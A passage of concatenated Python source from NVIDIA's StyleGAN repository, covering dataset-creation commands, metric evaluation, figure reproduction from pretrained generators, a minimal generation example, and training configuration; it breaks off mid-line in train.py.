img.shape[1] != resolution: error('Input images must have the same width and height') if resolution != 2 ** int(np.floor(np.log2(resolution))): error('Input image resolution must be a power-of-two') if channels not in [1, 3]: error('Input images must be stored as RGB or grayscale') with TFRecordExporter(tfrecord_dir, len(image_filenames)) as tfr: order = tfr.choose_shuffled_order() if shuffle else np.arange(len(image_filenames)) for idx in range(order.size): img = np.asarray(PIL.Image.open(image_filenames[order[idx]])) if channels == 1: img = img[np.newaxis, :, :] # HW => CHW else: img = img.transpose([2, 0, 1]) # HWC => CHW tfr.add_image(img) #---------------------------------------------------------------------------- def create_from_hdf5(tfrecord_dir, hdf5_filename, shuffle): print('Loading HDF5 archive from "%s"' % hdf5_filename) import h5py # conda install h5py with h5py.File(hdf5_filename, 'r') as hdf5_file: hdf5_data = max([value for key, value in hdf5_file.items() if key.startswith('data')], key=lambda lod: lod.shape[3]) with TFRecordExporter(tfrecord_dir, hdf5_data.shape[0]) as tfr: order = tfr.choose_shuffled_order() if shuffle else np.arange(hdf5_data.shape[0]) for idx in range(order.size): tfr.add_image(hdf5_data[order[idx]]) npy_filename = os.path.splitext(hdf5_filename)[0] + '-labels.npy' if os.path.isfile(npy_filename): tfr.add_labels(np.load(npy_filename)[order]) #---------------------------------------------------------------------------- def execute_cmdline(argv): prog = argv[0] parser = argparse.ArgumentParser( prog = prog, description = 'Tool for creating multi-resolution TFRecords datasets for StyleGAN and ProGAN.', epilog = 'Type "%s <command> -h" for more information.' % prog) subparsers = parser.add_subparsers(dest='command') subparsers.required = True def add_command(cmd, desc, example=None): epilog = 'Example: %s %s' % (prog, example) if example is not None else None return subparsers.add_parser(cmd, description=desc, help=desc, epilog=epilog) p = add_command( 'display', 'Display images in dataset.', 'display datasets/mnist') p.add_argument( 'tfrecord_dir', help='Directory containing dataset') p = add_command( 'extract', 'Extract images from dataset.', 'extract datasets/mnist mnist-images') p.add_argument( 'tfrecord_dir', help='Directory containing dataset') p.add_argument( 'output_dir', help='Directory to extract the images into') p = add_command( 'compare', 'Compare two datasets.', 'compare datasets/mydataset datasets/mnist') p.add_argument( 'tfrecord_dir_a', help='Directory containing first dataset') p.add_argument( 'tfrecord_dir_b', help='Directory containing second dataset') p.add_argument( '--ignore_labels', help='Ignore labels (default: 0)', type=int, default=0) p = add_command( 'create_mnist', 'Create dataset for MNIST.', 'create_mnist datasets/mnist ~/downloads/mnist') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'mnist_dir', help='Directory containing MNIST') p = add_command( 'create_mnistrgb', 'Create dataset for MNIST-RGB.', 'create_mnistrgb datasets/mnistrgb ~/downloads/mnist') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'mnist_dir', help='Directory containing MNIST') p.add_argument( '--num_images', help='Number of composite images to create (default: 1000000)', type=int, default=1000000) p.add_argument( '--random_seed', help='Random seed (default: 123)', type=int, default=123) p = add_command( 'create_cifar10', 'Create dataset for CIFAR-10.', 'create_cifar10 datasets/cifar10 ~/downloads/cifar10') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'cifar10_dir', help='Directory containing CIFAR-10') p = add_command( 'create_cifar100', 'Create dataset for CIFAR-100.', 'create_cifar100 datasets/cifar100 ~/downloads/cifar100') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'cifar100_dir', help='Directory containing CIFAR-100') p = add_command( 'create_svhn', 'Create dataset for SVHN.', 'create_svhn datasets/svhn ~/downloads/svhn') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'svhn_dir', help='Directory containing SVHN') p = add_command( 'create_lsun', 'Create dataset for single LSUN category.', 'create_lsun datasets/lsun-car-100k ~/downloads/lsun/car_lmdb --resolution 256 --max_images 100000') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'lmdb_dir', help='Directory containing LMDB database') p.add_argument( '--resolution', help='Output resolution (default: 256)', type=int, default=256) p.add_argument( '--max_images', help='Maximum number of images (default: none)', type=int, default=None) p = add_command( 'create_lsun_wide', 'Create LSUN dataset with non-square aspect ratio.', 'create_lsun_wide datasets/lsun-car-512x384 ~/downloads/lsun/car_lmdb --width 512 --height 384') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'lmdb_dir', help='Directory containing LMDB database') p.add_argument( '--width', help='Output width (default: 512)', type=int, default=512) p.add_argument( '--height', help='Output height (default: 384)', type=int, default=384) p.add_argument( '--max_images', help='Maximum number of images (default: none)', type=int, default=None) p = add_command( 'create_celeba', 'Create dataset for CelebA.', 'create_celeba datasets/celeba ~/downloads/celeba') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'celeba_dir', help='Directory containing CelebA') p.add_argument( '--cx', help='Center X coordinate (default: 89)', type=int, default=89) p.add_argument( '--cy', help='Center Y coordinate (default: 121)', type=int, default=121) p = add_command( 'create_from_images', 'Create dataset from a directory full of images.', 'create_from_images datasets/mydataset myimagedir') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'image_dir', help='Directory containing the images') p.add_argument( '--shuffle', help='Randomize image order (default: 1)', type=int, default=1) p = add_command( 'create_from_hdf5', 'Create dataset from legacy HDF5 archive.', 'create_from_hdf5 datasets/celebahq ~/downloads/celeba-hq-1024x1024.h5') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'hdf5_filename', help='HDF5 archive containing the images') p.add_argument( '--shuffle', help='Randomize image order (default: 1)', type=int, default=1) args = parser.parse_args(argv[1:] if len(argv) > 1 else ['-h']) func = globals()[args.command] del args.command func(**vars(args)) #---------------------------------------------------------------------------- if __name__ == "__main__": execute_cmdline(sys.argv) #---------------------------------------------------------------------------- File: run_metrics.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Main entry point for training StyleGAN and ProGAN networks.""" import dnnlib from dnnlib import EasyDict import dnnlib.tflib as tflib import config from metrics import metric_base from training import misc #---------------------------------------------------------------------------- def run_pickle(submit_config, metric_args, network_pkl, dataset_args, mirror_augment): ctx = dnnlib.RunContext(submit_config) tflib.init_tf() print('Evaluating %s metric on network_pkl "%s"...' % (metric_args.name, network_pkl)) metric = dnnlib.util.call_func_by_name(**metric_args) print() metric.run(network_pkl, dataset_args=dataset_args, mirror_augment=mirror_augment, num_gpus=submit_config.num_gpus) print() ctx.close() #---------------------------------------------------------------------------- def run_snapshot(submit_config, metric_args, run_id, snapshot): ctx = dnnlib.RunContext(submit_config) tflib.init_tf() print('Evaluating %s metric on run_id %s, snapshot %s...' % (metric_args.name, run_id, snapshot)) run_dir = misc.locate_run_dir(run_id) network_pkl = misc.locate_network_pkl(run_dir, snapshot) metric = dnnlib.util.call_func_by_name(**metric_args) print() metric.run(network_pkl, run_dir=run_dir, num_gpus=submit_config.num_gpus) print() ctx.close() #---------------------------------------------------------------------------- def run_all_snapshots(submit_config, metric_args, run_id): ctx = dnnlib.RunContext(submit_config) tflib.init_tf() print('Evaluating %s metric on all snapshots of run_id %s...' % (metric_args.name, run_id)) run_dir = misc.locate_run_dir(run_id) network_pkls = misc.list_network_pkls(run_dir) metric = dnnlib.util.call_func_by_name(**metric_args) print() for idx, network_pkl in enumerate(network_pkls): ctx.update('', idx, len(network_pkls)) metric.run(network_pkl, run_dir=run_dir, num_gpus=submit_config.num_gpus) print() ctx.close() #---------------------------------------------------------------------------- def main(): submit_config = dnnlib.SubmitConfig() # Which metrics to evaluate? metrics = [] metrics += [metric_base.fid50k] #metrics += [metric_base.ppl_zfull] #metrics += [metric_base.ppl_wfull] #metrics += [metric_base.ppl_zend] #metrics += [metric_base.ppl_wend] #metrics += [metric_base.ls] #metrics += [metric_base.dummy] # Which networks to evaluate them on? tasks = [] tasks += [EasyDict(run_func_name='run_metrics.run_pickle', network_pkl='https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ', dataset_args=EasyDict(tfrecord_dir='ffhq', shuffle_mb=0), mirror_augment=True)] # karras2019stylegan-ffhq-1024x1024.pkl #tasks += [EasyDict(run_func_name='run_metrics.run_snapshot', run_id=100, snapshot=25000)] #tasks += [EasyDict(run_func_name='run_metrics.run_all_snapshots', run_id=100)] # How many GPUs to use? submit_config.num_gpus = 1 #submit_config.num_gpus = 2 #submit_config.num_gpus = 4 #submit_config.num_gpus = 8 # Execute. submit_config.run_dir_root = dnnlib.submission.submit.get_template_from_path(config.result_dir) submit_config.run_dir_ignore += config.run_dir_ignore for task in tasks: for metric in metrics: submit_config.run_desc = '%s-%s' % (task.run_func_name, metric.name) if task.run_func_name.endswith('run_snapshot'): submit_config.run_desc += '-%s-%s' % (task.run_id, task.snapshot) if task.run_func_name.endswith('run_all_snapshots'): submit_config.run_desc += '-%s' % task.run_id submit_config.run_desc += '-%dgpu' % submit_config.num_gpus dnnlib.submit_run(submit_config, metric_args=metric, **task) #---------------------------------------------------------------------------- if __name__ == "__main__": main() #---------------------------------------------------------------------------- File: generate_figures.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Minimal script for reproducing the figures of the StyleGAN paper using pre-trained generators.""" import os import pickle import numpy as np import PIL.Image import dnnlib import dnnlib.tflib as tflib import config #---------------------------------------------------------------------------- # Helpers for loading and using pre-trained generators. url_ffhq = 'https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ' # karras2019stylegan-ffhq-1024x1024.pkl url_celebahq = 'https://drive.google.com/uc?id=1MGqJl28pN4t7SAtSrPdSRJSQJqahkzUf' # karras2019stylegan-celebahq-1024x1024.pkl url_bedrooms = 'https://drive.google.com/uc?id=1MOSKeGF0FJcivpBI7s63V9YHloUTORiF' # karras2019stylegan-bedrooms-256x256.pkl url_cars = 'https://drive.google.com/uc?id=1MJ6iCfNtMIRicihwRorsM3b7mmtmK9c3' # karras2019stylegan-cars-512x384.pkl url_cats = 'https://drive.google.com/uc?id=1MQywl0FNt6lHu8E_EUqnRbviagS7fbiJ' # karras2019stylegan-cats-256x256.pkl synthesis_kwargs = dict(output_transform=dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True), minibatch_size=8) _Gs_cache = dict() def load_Gs(url): if url not in _Gs_cache: with dnnlib.util.open_url(url, cache_dir=config.cache_dir) as f: _G, _D, Gs = pickle.load(f) _Gs_cache[url] = Gs return _Gs_cache[url] #---------------------------------------------------------------------------- # Figures 2, 3, 10, 11, 12: Multi-resolution grid of uncurated result images. def draw_uncurated_result_figure(png, Gs, cx, cy, cw, ch, rows, lods, seed): print(png) latents = np.random.RandomState(seed).randn(sum(rows * 2**lod for lod in lods), Gs.input_shape[1]) images = Gs.run(latents, None, **synthesis_kwargs) # [seed, y, x, rgb] canvas = PIL.Image.new('RGB', (sum(cw // 2**lod for lod in lods), ch * rows), 'white') image_iter = iter(list(images)) for col, lod in enumerate(lods): for row in range(rows * 2**lod): image = PIL.Image.fromarray(next(image_iter), 'RGB') image = image.crop((cx, cy, cx + cw, cy + ch)) image = image.resize((cw // 2**lod, ch // 2**lod), PIL.Image.ANTIALIAS) canvas.paste(image, (sum(cw // 2**lod for lod in lods[:col]), row * ch // 2**lod)) canvas.save(png) #---------------------------------------------------------------------------- # Figure 3: Style mixing. def draw_style_mixing_figure(png, Gs, w, h, src_seeds, dst_seeds, style_ranges): print(png) src_latents = np.stack(np.random.RandomState(seed).randn(Gs.input_shape[1]) for seed in src_seeds) dst_latents = np.stack(np.random.RandomState(seed).randn(Gs.input_shape[1]) for seed in dst_seeds) src_dlatents = Gs.components.mapping.run(src_latents, None) # [seed, layer, component] dst_dlatents = Gs.components.mapping.run(dst_latents, None) # [seed, layer, component] src_images = Gs.components.synthesis.run(src_dlatents, randomize_noise=False, **synthesis_kwargs) dst_images = Gs.components.synthesis.run(dst_dlatents, randomize_noise=False, **synthesis_kwargs) canvas = PIL.Image.new('RGB', (w * (len(src_seeds) + 1), h * (len(dst_seeds) + 1)), 'white') for col, src_image in enumerate(list(src_images)): canvas.paste(PIL.Image.fromarray(src_image, 'RGB'), ((col + 1) * w, 0)) for row, dst_image in enumerate(list(dst_images)): canvas.paste(PIL.Image.fromarray(dst_image, 'RGB'), (0, (row + 1) * h)) row_dlatents = np.stack([dst_dlatents[row]] * len(src_seeds)) row_dlatents[:, style_ranges[row]] = src_dlatents[:, style_ranges[row]] row_images = Gs.components.synthesis.run(row_dlatents, randomize_noise=False, **synthesis_kwargs) for col, image in enumerate(list(row_images)): canvas.paste(PIL.Image.fromarray(image, 'RGB'), ((col + 1) * w, (row + 1) * h)) canvas.save(png) #---------------------------------------------------------------------------- # Figure 4: Noise detail. def draw_noise_detail_figure(png, Gs, w, h, num_samples, seeds): print(png) canvas = PIL.Image.new('RGB', (w * 3, h * len(seeds)), 'white') for row, seed in enumerate(seeds): latents = np.stack([np.random.RandomState(seed).randn(Gs.input_shape[1])] * num_samples) images = Gs.run(latents, None, truncation_psi=1, **synthesis_kwargs) canvas.paste(PIL.Image.fromarray(images[0], 'RGB'), (0, row * h)) for i in range(4): crop = PIL.Image.fromarray(images[i + 1], 'RGB') crop = crop.crop((650, 180, 906, 436)) crop = crop.resize((w//2, h//2), PIL.Image.NEAREST) canvas.paste(crop, (w + (i%2) * w//2, row * h + (i//2) * h//2)) diff = np.std(np.mean(images, axis=3), axis=0) * 4 diff = np.clip(diff + 0.5, 0, 255).astype(np.uint8) canvas.paste(PIL.Image.fromarray(diff, 'L'), (w * 2, row * h)) canvas.save(png) #---------------------------------------------------------------------------- # Figure 5: Noise components. def draw_noise_components_figure(png, Gs, w, h, seeds, noise_ranges, flips): print(png) Gsc = Gs.clone() noise_vars = [var for name, var in Gsc.components.synthesis.vars.items() if name.startswith('noise')] noise_pairs = list(zip(noise_vars, tflib.run(noise_vars))) # [(var, val), ...] latents = np.stack(np.random.RandomState(seed).randn(Gs.input_shape[1]) for seed in seeds) all_images = [] for noise_range in noise_ranges: tflib.set_vars({var: val * (1 if i in noise_range else 0) for i, (var, val) in enumerate(noise_pairs)}) range_images = Gsc.run(latents, None, truncation_psi=1, randomize_noise=False, **synthesis_kwargs) range_images[flips, :, :] = range_images[flips, :, ::-1] all_images.append(list(range_images)) canvas = PIL.Image.new('RGB', (w * 2, h * 2), 'white') for col, col_images in enumerate(zip(*all_images)): canvas.paste(PIL.Image.fromarray(col_images[0], 'RGB').crop((0, 0, w//2, h)), (col * w, 0)) canvas.paste(PIL.Image.fromarray(col_images[1], 'RGB').crop((w//2, 0, w, h)), (col * w + w//2, 0)) canvas.paste(PIL.Image.fromarray(col_images[2], 'RGB').crop((0, 0, w//2, h)), (col * w, h)) canvas.paste(PIL.Image.fromarray(col_images[3], 'RGB').crop((w//2, 0, w, h)), (col * w + w//2, h)) canvas.save(png) #---------------------------------------------------------------------------- # Figure 8: Truncation trick. def draw_truncation_trick_figure(png, Gs, w, h, seeds, psis): print(png) latents = np.stack(np.random.RandomState(seed).randn(Gs.input_shape[1]) for seed in seeds) dlatents = Gs.components.mapping.run(latents, None) # [seed, layer, component] dlatent_avg = Gs.get_var('dlatent_avg') # [component] canvas = PIL.Image.new('RGB', (w * len(psis), h * len(seeds)), 'white') for row, dlatent in enumerate(list(dlatents)): row_dlatents = (dlatent[np.newaxis] - dlatent_avg) * np.reshape(psis, [-1, 1, 1]) + dlatent_avg row_images = Gs.components.synthesis.run(row_dlatents, randomize_noise=False, **synthesis_kwargs) for col, image in enumerate(list(row_images)): canvas.paste(PIL.Image.fromarray(image, 'RGB'), (col * w, row * h)) canvas.save(png) #---------------------------------------------------------------------------- # Main program. def main(): tflib.init_tf() os.makedirs(config.result_dir, exist_ok=True) draw_uncurated_result_figure(os.path.join(config.result_dir, 'figure02-uncurated-ffhq.png'), load_Gs(url_ffhq), cx=0, cy=0, cw=1024, ch=1024, rows=3, lods=[0,1,2,2,3,3], seed=5) draw_style_mixing_figure(os.path.join(config.result_dir, 'figure03-style-mixing.png'), load_Gs(url_ffhq), w=1024, h=1024, src_seeds=[639,701,687,615,2268], dst_seeds=[888,829,1898,1733,1614,845], style_ranges=[range(0,4)]*3+[range(4,8)]*2+[range(8,18)]) draw_noise_detail_figure(os.path.join(config.result_dir, 'figure04-noise-detail.png'), load_Gs(url_ffhq), w=1024, h=1024, num_samples=100, seeds=[1157,1012]) draw_noise_components_figure(os.path.join(config.result_dir, 'figure05-noise-components.png'), load_Gs(url_ffhq), w=1024, h=1024, seeds=[1967,1555], noise_ranges=[range(0, 18), range(0, 0), range(8, 18), range(0, 8)], flips=[1]) draw_truncation_trick_figure(os.path.join(config.result_dir, 'figure08-truncation-trick.png'), load_Gs(url_ffhq), w=1024, h=1024, seeds=[91,388], psis=[1, 0.7, 0.5, 0, -0.5, -1]) draw_uncurated_result_figure(os.path.join(config.result_dir, 'figure10-uncurated-bedrooms.png'), load_Gs(url_bedrooms), cx=0, cy=0, cw=256, ch=256, rows=5, lods=[0,0,1,1,2,2,2], seed=0) draw_uncurated_result_figure(os.path.join(config.result_dir, 'figure11-uncurated-cars.png'), load_Gs(url_cars), cx=0, cy=64, cw=512, ch=384, rows=4, lods=[0,1,2,2,3,3], seed=2) draw_uncurated_result_figure(os.path.join(config.result_dir, 'figure12-uncurated-cats.png'), load_Gs(url_cats), cx=0, cy=0, cw=256, ch=256, rows=5, lods=[0,0,1,1,2,2,2], seed=1) #---------------------------------------------------------------------------- if __name__ == "__main__": main() #---------------------------------------------------------------------------- File: config.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Global configuration.""" #---------------------------------------------------------------------------- # Paths. result_dir = 'results' data_dir = 'datasets' cache_dir = 'cache' run_dir_ignore = ['results', 'datasets', 'cache'] #---------------------------------------------------------------------------- File: pretrained_example.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Minimal script for generating an image using pre-trained StyleGAN generator.""" import os import pickle import numpy as np import PIL.Image import dnnlib import dnnlib.tflib as tflib import config def main(): # Initialize TensorFlow. tflib.init_tf() # Load pre-trained network. url = 'https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ' # karras2019stylegan-ffhq-1024x1024.pkl with dnnlib.util.open_url(url, cache_dir=config.cache_dir) as f: _G, _D, Gs = pickle.load(f) # _G = Instantaneous snapshot of the generator. Mainly useful for resuming a previous training run. # _D = Instantaneous snapshot of the discriminator. Mainly useful for resuming a previous training run. # Gs = Long-term average of the generator. Yields higher-quality results than the instantaneous snapshot. # Print network details. Gs.print_layers() # Pick latent vector. rnd = np.random.RandomState(5) latents = rnd.randn(1, Gs.input_shape[1]) # Generate image. fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True) images = Gs.run(latents, None, truncation_psi=0.7, randomize_noise=True, output_transform=fmt) # Save image. os.makedirs(config.result_dir, exist_ok=True) png_filename = os.path.join(config.result_dir, 'example.png') PIL.Image.fromarray(images[0], 'RGB').save(png_filename) if __name__ == "__main__": main() File: train.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Main entry point for training StyleGAN and ProGAN networks.""" import copy import dnnlib from dnnlib import EasyDict import config from metrics import metric_base #---------------------------------------------------------------------------- # Official training configs for StyleGAN, targeted mainly for FFHQ. if 1: desc = 'sgan' # Description string included in result subdir name. train = EasyDict(run_func_name='training.training_loop.training_loop') # Options for training loop. G = EasyDict(func_name='training.networks_stylegan.G_style') # Options for generator network. D = EasyDict(func_name='training.networks_stylegan.D_basic') # Options for discriminator network. G_opt = EasyDict(beta1=0.0, beta2=0.99, epsilon=1e-8) # Options for generator optimizer. D_opt = EasyDict(beta1=0.0, beta2=0.99, epsilon=1e-8) # Options for discriminator optimizer. G_loss = EasyDict(func_name='training.loss.G_logistic_nonsaturating') # Options for generator loss. D_loss = EasyDict(func_name='training.loss.D_logistic_simplegp', r1_gamma=10.0) # Options for discriminator loss. dataset = EasyDict() # Options for load_dataset(). sched = EasyDict() # Options for TrainingSchedule. grid = EasyDict(size='4k', layout='random') # Options for setup_snapshot_image_grid(). metrics = [metric_base.fid50k] # Options for MetricGroup. submit_config = dnnlib.SubmitConfig() # Options for dnnlib.submit_run(). tf_config = {'rnd.np_random_seed': 1000} # Options for tflib.init_tf(). # Dataset. desc += '-ffhq'; dataset = EasyDict(tfrecord_dir='ffhq'); train.mirror_augment = True #desc += '-ffhq512'; dataset = EasyDict(tfrecord_dir='ffhq', resolution=512); train.mirror_augment = True #desc += '-ffhq256'; dataset = EasyDict(tfrecord_dir='ffhq', resolution=256); train.mirror_augment = True #desc += '-celebahq'; dataset = EasyDict(tfrecord_dir='celebahq'); train.mirror_augment = True #desc += '-bedroom'; dataset = EasyDict(tfrecord_dir='lsun-bedroom-full'); train.mirror_augment = False #desc += '-car'; dataset = EasyDict(tfrecord_dir='lsun-car-512x384'); train.mirror_augment = False #desc += '-cat'; dataset = EasyDict(tfrecord_dir='lsun-cat-full'); train.mirror_augment = False # Number of GPUs. #desc += '-1gpu'; submit_config.num_gpus = 1; sched.minibatch_base = 4; sched.minibatch_dict = {4: 128, 8: 128, 16: 128, 32: 64, 64: 32, 128: 16, 256: 8, 512: 4} #desc += '-2gpu'; submit_config.num_gpus = 2; sched.minibatch_base = 8; sched.minibatch_dict = {4: 256, 8: 256, 16: 128, 32: 64, 64: 32, 128: 16, 256: 8} #desc += '-4gpu'; submit_config.num_gpus = 4; sched.minibatch_base = 16; sched.minibatch_dict = {4: 512, 8: 256, 16: 128, 32: 64, 64: 32, 128: 16} desc += '-8gpu'; submit_config.num_gpus = 8; sched.minibatch_base = 32; sched.minibatch_dict = {4: 512, 8: 256, 16: 128, 32: 64, 64: 32} # Default options. train.total_kimg = 25000 sched.lod_initial_resolution = 8 sched.G_lrate_dict = {128: 0.0015, 256: 0.002, 512: 0.003, 1024: 0.003} sched.D_lrate_dict = EasyDict(sched.G_lrate_dict) # WGAN-GP loss for CelebA-HQ. #desc += '-wgangp'; G_loss = EasyDict(func_name='training.loss.G_wgan'); D_loss = EasyDict(func_name='training.loss.D_wgan_gp'); sched.G_lrate_dict = {k: min(v, 0.002) for k, v in sched.G_lrate_dict.items()}; sched.D_lrate_dict = EasyDict(sched.G_lrate_dict) # Table 1. #desc += '-tuned-baseline'; G.use_styles = False; G.use_pixel_norm = True; G.use_instance_norm = False; G.mapping_layers = 0; G.truncation_psi = None; G.const_input_layer = False; G.style_mixing_prob = 0.0; G.use_noise = False #desc += '-add-mapping-and-styles'; G.const_input_layer = False; G.style_mixing_prob = 0.0; G.use_noise = False #desc += '-remove-traditional-input'; G.style_mixing_prob = 0.0; G.use_noise = False #desc += '-add-noise-inputs'; G.style_mixing_prob = 0.0 #desc += '-mixing-regularization' # default # Table 2. #desc += '-mix0'; G.style_mixing_prob = 0.0 #desc += '-mix50'; G.style_mixing_prob = 0.5 #desc += '-mix90'; G.style_mixing_prob = 0.9 # default #desc += '-mix100'; G.style_mixing_prob = 1.0 # Table 4. #desc += '-traditional-0'; G.use_styles = False; G.use_pixel_norm = True; G.use_instance_norm = False; G.mapping_layers = 0; G.truncation_psi = None; G.const_input_layer = False; G.style_mixing_prob = 0.0; G.use_noise = False #desc += '-traditional-8'; G.use_styles = False; G.use_pixel_norm = True; G.use_instance_norm = False; G.mapping_layers = 8; G.truncation_psi = None; G.const_input_layer = False; G.style_mixing_prob = 0.0; G.use_noise = False #desc += '-stylebased-0'; G.mapping_layers = 0 #desc += '-stylebased-1'; G.mapping_layers = 1 #desc += '-stylebased-2'; G.mapping_layers = 2 #desc += '-stylebased-8'; G.mapping_layers = 8 # default #---------------------------------------------------------------------------- # Official training configs for Progressive GAN, targeted mainly for CelebA-HQ. if 0: desc = 'pgan' # Description string included in result subdir name. train = EasyDict(run_func_name='training.training_loop.training_loop') # Options for training loop. G = EasyDict(func_name='training.networks_progan.G_paper') # Options for generator network. D = EasyDict(func_name='training.networks_progan.D_paper') # Options for discriminator network. G_opt = EasyDict(beta1=0.0, beta2=0.99, epsilon=1e-8) # Options for generator optimizer. D_opt = EasyDict(beta1=0.0, beta2=0.99, epsilon=1e-8) # Options for discriminator optimizer. G_loss = EasyDict(func_name='training.loss.G_wgan') # Options for generator loss. D_loss = EasyDict(func_name='training.loss.D_wgan_gp') # Options for discriminator loss. dataset = EasyDict() # Options for load_dataset(). sched = EasyDict() # Options for TrainingSchedule. grid = EasyDict(size='1080p', layout='random') # Options for setup_snapshot_image_grid(). metrics = [metric_base.fid50k] # Options for MetricGroup. submit_config = dnnlib.SubmitConfig() # Options for dnnlib.submit_run(). tf_config = {'rnd.np_random_seed': 1000} # Options for tflib.init_tf(). # Dataset (choose one). desc += '-celebahq'; dataset = EasyDict(tfrecord_dir='celebahq'); train.mirror_augment = True #desc += '-celeba'; dataset = EasyDict(tfrecord_dir='celeba'); train.mirror_augment = True #desc += '-cifar10'; dataset = EasyDict(tfrecord_dir='cifar10') #desc += '-cifar100'; dataset = EasyDict(tfrecord_dir='cifar100') #desc += '-svhn'; dataset = EasyDict(tfrecord_dir='svhn') #desc += '-mnist'; dataset = EasyDict(tfrecord_dir='mnist') #desc += '-mnistrgb'; dataset = EasyDict(tfrecord_dir='mnistrgb') #desc += '-syn1024rgb'; dataset = EasyDict(class_name='training.dataset.SyntheticDataset', resolution=1024, num_channels=3) #desc += '-lsun-airplane'; dataset = EasyDict(tfrecord_dir='lsun-airplane-100k'); train.mirror_augment = True #desc += '-lsun-bedroom'; dataset = EasyDict(tfrecord_dir='lsun-bedroom-100k'); train.mirror_augment = True #desc += '-lsun-bicycle'; dataset = EasyDict(tfrecord_dir='lsun-bicycle-100k'); train.mirror_augment = True #desc += '-lsun-bird'; dataset = EasyDict(tfrecord_dir='lsun-bird-100k'); train.mirror_augment = True #desc += '-lsun-boat'; dataset = EasyDict(tfrecord_dir='lsun-boat-100k'); train.mirror_augment = True #desc += '-lsun-bottle'; dataset = EasyDict(tfrecord_dir='lsun-bottle-100k'); train.mirror_augment = True #desc += '-lsun-bridge'; dataset = EasyDict(tfrecord_dir='lsun-bridge-100k'); train.mirror_augment = True #desc += '-lsun-bus'; dataset = EasyDict(tfrecord_dir='lsun-bus-100k'); train.mirror_augment = True #desc += '-lsun-car'; dataset = EasyDict(tfrecord_dir='lsun-car-100k'); train.mirror_augment = True #desc += '-lsun-cat'; dataset = EasyDict(tfrecord_dir='lsun-cat-100k'); train.mirror_augment = True #desc += '-lsun-chair'; dataset = EasyDict(tfrecord_dir='lsun-chair-100k'); train.mirror_augment = True #desc += '-lsun-churchoutdoor'; dataset = EasyDict(tfrecord_dir='lsun-churchoutdoor-100k'); train.mirror_augment = True #desc += '-lsun-classroom'; dataset = EasyDict(tfrecord_dir='lsun-classroom-100k'); train.mirror_augment = True #desc += '-lsun-conferenceroom'; dataset = EasyDict(tfrecord_dir='lsun-conferenceroom-100k'); train.mirror_augment = True #desc += '-lsun-cow'; dataset = EasyDict(tfrecord_dir='lsun-cow-100k'); train.mirror_augment = True #desc += '-lsun-diningroom'; dataset = EasyDict(tfrecord_dir='lsun-diningroom-100k'); train.mirror_augment = True #desc += '-lsun-diningtable'; dataset = EasyDict(tfrecord_dir='lsun-diningtable-100k'); train.mirror_augment = True #desc += '-lsun-dog'; dataset = EasyDict(tfrecord_dir='lsun-dog-100k'); train.mirror_augment = True #desc += '-lsun-horse'; dataset = EasyDict(tfrecord_dir='lsun-horse-100k'); train.mirror_augment = True #desc += '-lsun-kitchen'; dataset = EasyDict(tfrecord_dir='lsun-kitchen-100k'); train.mirror_augment = True #desc += '-lsun-livingroom'; dataset = EasyDict(tfrecord_dir='lsun-livingroom-100k'); train.mirror_augment = True #desc += '-lsun-motorbike'; dataset = EasyDict(tfrecord_dir='lsun-motorbike-100k'); train.mirror_augment = True #desc += '-lsun-person'; dataset = EasyDict(tfrecord_dir='lsun-person-100k'); train.mirror_augment = True #desc += '-lsun-pottedplant'; dataset = EasyDict(tfrecord_dir='lsun-pottedplant-100k'); train.mirror_augment = True #desc += '-lsun-restaurant'; dataset = EasyDict(tfrecord_dir='lsun-restaurant-100k'); train.mirror_augment = True #desc += '-lsun-sheep'; dataset = EasyDict(tfrecord_dir='lsun-sheep-100k'); train.mirror_augment = True #desc += '-lsun-sofa'; dataset = EasyDict(tfrecord_dir='lsun-sofa-100k'); train.mirror_augment = True #desc += '-lsun-tower'; dataset = EasyDict(tfrecord_dir='lsun-tower-100k'); train.mirror_augment = True #desc += '-lsun-train'; dataset = EasyDict(tfrecord_dir='lsun-train-100k'); train.mirror_augment = True #desc += '-lsun-tvmonitor'; dataset = EasyDict(tfrecord_dir='lsun-tvmonitor-100k'); train.mirror_augment = True # Conditioning & snapshot options. #desc += '-cond'; 